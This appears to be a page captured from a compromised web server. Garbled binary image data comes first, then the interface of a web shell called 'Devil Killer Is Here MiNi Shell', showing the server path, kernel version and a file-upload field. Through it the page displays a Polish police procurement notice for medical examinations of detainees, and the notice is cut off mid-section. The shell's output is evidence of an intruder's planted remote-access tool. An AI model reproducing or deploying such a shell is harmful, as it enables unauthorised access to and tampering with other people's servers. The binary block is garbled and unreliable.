JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250606/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250606/0026640501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenia medyczne w zakresie badań lekarskich, pobrań krwi osób zatrzymanych przez Policję dla podległych jednostek garnizonu mazowieckiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji z siedzibą w Radomiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670897379</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 37/59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.kwp@ra.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.mazowiecka.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenia medyczne w zakresie badań lekarskich, pobrań krwi osób zatrzymanych przez Policję dla podległych jednostek garnizonu mazowieckiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c7789a4d-b718-461f-b55a-04444d7b833d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00266405</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00058306/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.13 Świadczenie usług medycznych w zakresie badań lekarskich, pobrań krwi osób zatrzymanych przez Policję podległych jednostek garnizonu mazowieckiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kwp_radom <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/kwp_radom.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym<br/>a wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej pod adresem:<br/>https://platformazakupowa.pl/pn/kwp_radom (inna niż oferta wykonawcy i załączniki do oferty) za pośrednictwem dedykowanego<br/>formularza poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po którym pojawi się komunikat, że wiadomość<br/>została wysłana do Zamawiającego.<br/>3. We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający<br/>i wykonawcy posługują się numerem ogłoszenia z BZP a dodatkowo numerem wewnętrznym postępowania.<br/>4. Wykonawca ma dostęp do formularza „Wyślij wiadomość do zamawiającego” dostępny<br/>na stronie dotyczącej danego postępowania.<br/>5. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania<br/>i otwarcia ofert zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>https://platformazakupowa.pl/pn/kwp_radom do konkretnego wykonawcy.<br/>6. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów<br/>i wiadomości bezpośrednio na https://platformazakupowa.pl/pn/kwp_radom przesłanych przez zamawiającego, gdyż system<br/>powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>7. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przy użyciu środków komunikacji elektronicznej, określają „REGULAMIN platformazakupowa.pl”, który znajduje się na stronie<br/>głównej Platformy oraz „Instrukcja dla Wykonawców platformazakupowa.pl” dostępna jest pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>8. Maksymalny rozmiar jednego pliku przesyłanego za pomocą dedykowanego formularza przy komunikacji to maksymalnie 500 MB.<br/>9. Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej, e-mail:<br/>monika.gluch@ra.policja.gov.pl<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanej w SWZ w tym w przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69.<br/>11. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu<br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowoaplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich<br/>nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Z uwagi na ograniczoną ilość znaków , pełna informacja w powyższym zakresie zawarta jest w SWZ zamieszczonej pod adresem<br/>https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Dane osobowe przetwarzane w trybie RODO w KWP z siedzibą w Radomiu<br/>(postępowanie o udzielenie zamówienia publicznego):<br/>Szanowna Pani/Szanowny Panie,<br/>w związku z wejściem w życie rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) z dnia 27 kwietnia 2016 r. (Dz. Urz. UE. L Nr 119, str. 1),<br/>dalej „RODO”, dochowując warunków w nim zawartych informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji z siedzibą w Radomiu - adres: ul. 11-go<br/>Listopada 37/59, 26-600 Radom.<br/>2. Nadzór nad prawidłowym przetwarzaniem danych osobowych w Komendzie Wojewódzkiej Policji z siedzibą w Radomiu sprawuje<br/>inspektor ochrony danych: Sylwia Fila - adres: ul. 11-go Listopada 37/59, 26-600 Radom - e-mail: iod.kwp@ra.policja.gov.pl.<br/>3. Cel i okres przetwarzania danych osobowych w Komendzie Wojewódzkiej Policji z siedzibą w Radomiu.<br/>W KWP z siedzibą w Radomiu dane osobowe przetwarza się wyłącznie w konkretnych, wyraźnych i prawnie uzasadnionych celach i<br/>nie przetwarza się ich dalej w sposób niezgodny z tymi celami. Przetwarzanie danych jest niezbędne do wypełnienia obowiązku<br/>prawnego ciążącego na administratorze (art. 6 ust.1 lit. c RODO) zgodnie z:<br/>- Ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych – dalej zwaną ustawą Pzp,<br/>- Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy, oraz Rozporządzeniem Ministra Rozwoju,<br/>Pracy<br/>i Technologii z dnia 3 sierpnia 2023 r. zmieniającym rozporządzenie w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy,<br/>- Dyrektywą Parlamentu Europejskiego i Rady 2014/24/UE z dnia 26 lutego 2014 r. w sprawie zamówień publicznych, uchylająca<br/>dyrektywę 2004/18/WE.<br/>Okres przetwarzania danych osobowych wynika bezpośrednio z przepisów prawa i jest adekwatny do celów.<br/>4. Odbiorcy danych osobowych.<br/>W rozumieniu RODO odbiorcami danych osobowych nie są organy publiczne, które mogą otrzymywać dane osobowe w ramach<br/>konkretnego postępowania zgodnie z prawem Unii lub prawem państwa członkowskiego. Dane osobowe nie są udostępniane<br/>podmiotom innym niż uprawnione na podstawie przepisów prawa. Dane będą udostępniane uprawnionym podmiotom jedynie w celu<br/>umożliwienia korzystania ze środków ochrony prawnej oraz tylko do upływu terminu na ich wniesienie.<br/>5. Osobom, których dane są przetwarzane zgodnie z RODO przysługuje:<br/>- prawo dostępu do własnych danych osobowych na zasadach określonych w ustawie Pzp,<br/>- prawo do żądania od administratora sprostowania, uzupełnienia danych, jednak nie może ono skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym<br/>z ustawą Pzp,<br/>- prawo do ograniczenia przetwarzania własnych danych osobowych, ale to nie może ograniczać przetwarzania danych osobowych<br/>do czasu zakończenia postępowania,<br/>- prawo do wniesienia sprzeciwu wobec przetwarzania w sytuacjach przewidzianych prawem,<br/>- prawo do wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych, w przypadku<br/>uznania, że przetwarzanie danych osobowych narusza przepisy RODO.<br/>6. Przy przetwarzaniu danych osobowych w trybie RODO nie występuje zautomatyzowane podejmowanie decyzji o przetwarzaniu<br/>danych osobowych, w tym profilowanie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">28/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 1 - KPP Białobrzegi<br/>Przedmiotem zamówienia są całodobowe, świadczone przez 7 dni w tygodniu usługi medyczne wobec osób zatrzymanych przez Policję garnizonu mazowieckiego w skład których wchodzić będzie:<br/>1.	Wykonanie badania lekarskiego osoby zatrzymanej, doprowadzonej przez Policję <br/>Po przeprowadzeniu badania lekarskiego lekarz stwierdza: <br/>a) brak przeciwwskazań medycznych do przebywania osoby w pomieszczeniu przeznaczonym <br/>dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pomieszczeniu przejściowym, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym <br/>b) wystąpienie przeciwwskazań medycznych do przebywania tej osoby w policyjnym pomieszczeniu przeznaczonym dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoju przejściowym, tymczasowym pomieszczeniu przejściowych, policyjnej izbie dziecka, areszcie śledczym, zakładzie karnym, schronisku dla nieletnich lub zakładzie poprawczym oraz konieczności skierowania jej do podmiotu leczniczego.<br/><br/>Okoliczności, wskazane w podpunkcie a) i b) lekarz stwierdza w zaświadczeniu według wzoru stanowiącego załącznik do umowy (Nr 2 – właściwy dla osoby zatrzymanej lub Nr 3 właściwy dla osoby doprowadzonej w celu wytrzeźwienia) <br/><br/><br/>2.	Pobranie krwi od osoby doprowadzonej (bez badania analitycznego)<br/>Pakiet pobrania krwi wraz z drukiem protokołu pobrania krwi dostarcza <br/>każdorazowo policjant jednostki organizacyjnej Policji dokonującej zlecenia wykonania usługi. Policjant zabiera ze sobą pakiet z pobraną krwią celem dalszych badań laboratoryjnych. Pobranie krwi <br/>do badania odbywa się z zachowaniem warunków określonych w Rozporządzeniu Ministra Zdrowia <br/>z dnia 28 grudnia 2018 roku w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 2018 poz. 2472).<br/>Badanie lekarskie osoby zatrzymanej przeprowadza się niezwłocznie, w miarę możliwości przed innymi oczekującymi osobami zgodnie z § 4 ust.1 Rozporządzenia Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (Dz. U. z 2024 r. poz.516). <br/><br/>Przedmiot zamówienia należy wykonywać stosownie do postanowień zawartych w:<br/>	Rozporządzeniu Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (tj. Dz. U. z 2024 r., poz. 516), <br/>	Rozporządzeniu Ministra Spraw Wewnętrznych z dnia 4 czerwca 2012 r. w sprawie pomieszczeń przeznaczonych dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoi przejściowych, tymczasowych pomieszczeń i policyjnych izb dziecka, regulaminu pobytu w tych pomieszczeniach, pokojach i izbach oraz sposobu postępowania z zapisami obrazu z tych pomieszczeń pokoi i izba (tj. Dz. U. z 2023 r. poz. 2672 z póź. zm.), <br/>	Rozporządzeniu Ministra Zdrowia z dnia 28 grudnia 2018 roku w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 2018 poz. 2472).<br/>Badania lekarskie lub pobrania krwi będące przedmiotem zamówienia wykonawca wykonuje osobom doprowadzonym przez Policję w oparciu o pisemny wniosek dyżurnego jednostki Policji dokonującej zatrzymania, doprowadzenia, a w sytuacji widocznych obrażeń ciała lub utraty przytomności, także <br/>na ustny wniosek policjanta, a następnie potwierdzony pisemnym wnioskiem w ciągu 24 godzin. <br/>Wzór wniosku stanowi załącznik nr 1 do umowy. W ramach przedmiotu zamówienia wykonawca ma obowiązek w przypadkach koniecznych do opatrzenia ran u osoby badanej, a także wystawienia recepty na niezbędne leki.<br/>Wykonawca ponosi pełną odpowiedzialność za ewentualne błędy medyczne popełnione w trakcie realizacji usługi medycznej.<br/>Leczenie i udzielanie pomocy medycznej w nagłych przypadkach zagrożenia zdrowia lub życia osobom zatrzymanym przez Policję (w tym przebywającym w pomieszczeniach dla osób zatrzymanych) nie wchodzi w zakres przedmiotu zamówienia i odbywa się na zasadach powszechnego ubezpieczenia zdrowotnego.<br/>Transport osoby zatrzymanej w celu przeprowadzenia badania lekarskiego lub pobrania krwi <br/>zapewnia Policja, z zastrzeżeniem sytuacji, w której stan zdrowia osoby zatrzymanej <br/>wskazuje na potrzebę użycia do jej przewiezienia specjalnego środka transportu sanitarnego.<br/>Wykonawca zobowiązany będzie do wykonywania usług będących przedmiotem umowy całodobowo przez cały rok kalendarzowy, we wszystkie dni tygodnia, dni świąteczne i ustawowo wolne od pracy.<br/>Wykonawca zobowiązany jest świadczyć przedmiotowe usługi we wskazanej przez siebie placówce. Adres placówki w której świadczone będą usługi wykonawca poda w Formularzu ofertowym. <br/>Dla zadania nr 1 placówka medyczna wskazana przez wykonawcę winna być usytuowana w granicach administracyjnych miasta powiatowego lub powiatu odpowiadającego jednostce Policji w ramach zadania. <br/>Ilość świadczonych usług przyjętych przez zamawiającego to ilość szacunkowa. Rzeczywista ilość badań lekarskich lub pobrań krwi będzie wynikała z faktycznych potrzeb zamawiającego <br/> w tym zakresie. Wykonawca nie będzie rościł żadnych praw w przypadku gdy zamawiający <br/>zamówi mniejszą ilość usług niż wskazana w tabeli. Minimalna wielkość usług wyniesie 60% wartości zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie:<br/><br/>a.	cena - 100 % (100 pkt. maksymalna liczba punktów, która może być przyznana)<br/><br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami<br/>a) dla kryterium cena: <br/><br/> C N<br/>C = -------- x 100 pkt<br/> Co<br/> <br/>gdzie:<br/> C - przyznane punkty w kryterium cena, <br/>CN - najniższa cena ofertowa (brutto) spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/><br/>Ograniczenie w zakresie stosowania kryterium ceny nie będzie mieć zastosowania <br/>w sytuacji, gdy zamawiający określi w opisie przedmiotu zamówienia wymagania jakościowe odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia. <br/>W niniejszym postępowaniu przedmiot zamówienia ma ustalone standardy jakościowe. Zamawiający na wystarczającym poziomie określił cechy jakościowe jakie ma spełniać usługa będąca przedmiotem zamówienia, ponieważ jej wymagania jakościowe szczegółowo określają przepisy prawa - przedmiotem zamówienia są usługi medyczne wynikające w całości z Rozporządzenia Ministra Spraw Wewnętrznych z dnia 13 września 2012 r. w sprawie badań lekarskich osób zatrzymanych przez Policję (tj. Dz. U. z 2024 r, poz. 516), Rozporządzenia Ministra Spraw Wewnętrznych z dnia 4 czerwca 2012 r. w sprawie pomieszczeń przeznaczonych dla osób zatrzymanych lub doprowadzonych w celu wytrzeźwienia, pokoi przejściowych, tymczasowych pomieszczeń i policyjnych izb dziecka, regulaminu pobytu w tych pomieszczeniach, pokojach i izbach oraz sposobu postępowania z zapisami obrazu z tych pomieszczeń pokoi i izba (tj. Dz. U. z 2023 r. poz. 2672 z póź. zm.), Rozporządzenia Ministra Zdrowia z dnia 28 grudnia 2018 roku w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 2018 poz. 2472).<br/><br/><br/>Za najkorzystniejszą zostanie uznana oferta w ramach zadania nr 1-3 spośród złożonych, ważnych i niepodlegających odrzuceniu ofert, która uzyska najwyższą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 2 - KPP Mława , KPP Żuromin - pomieszczenia dla osób zatrzymanych przez policjantów z KPP w Mławie i z KPP w Żurominie znajdują 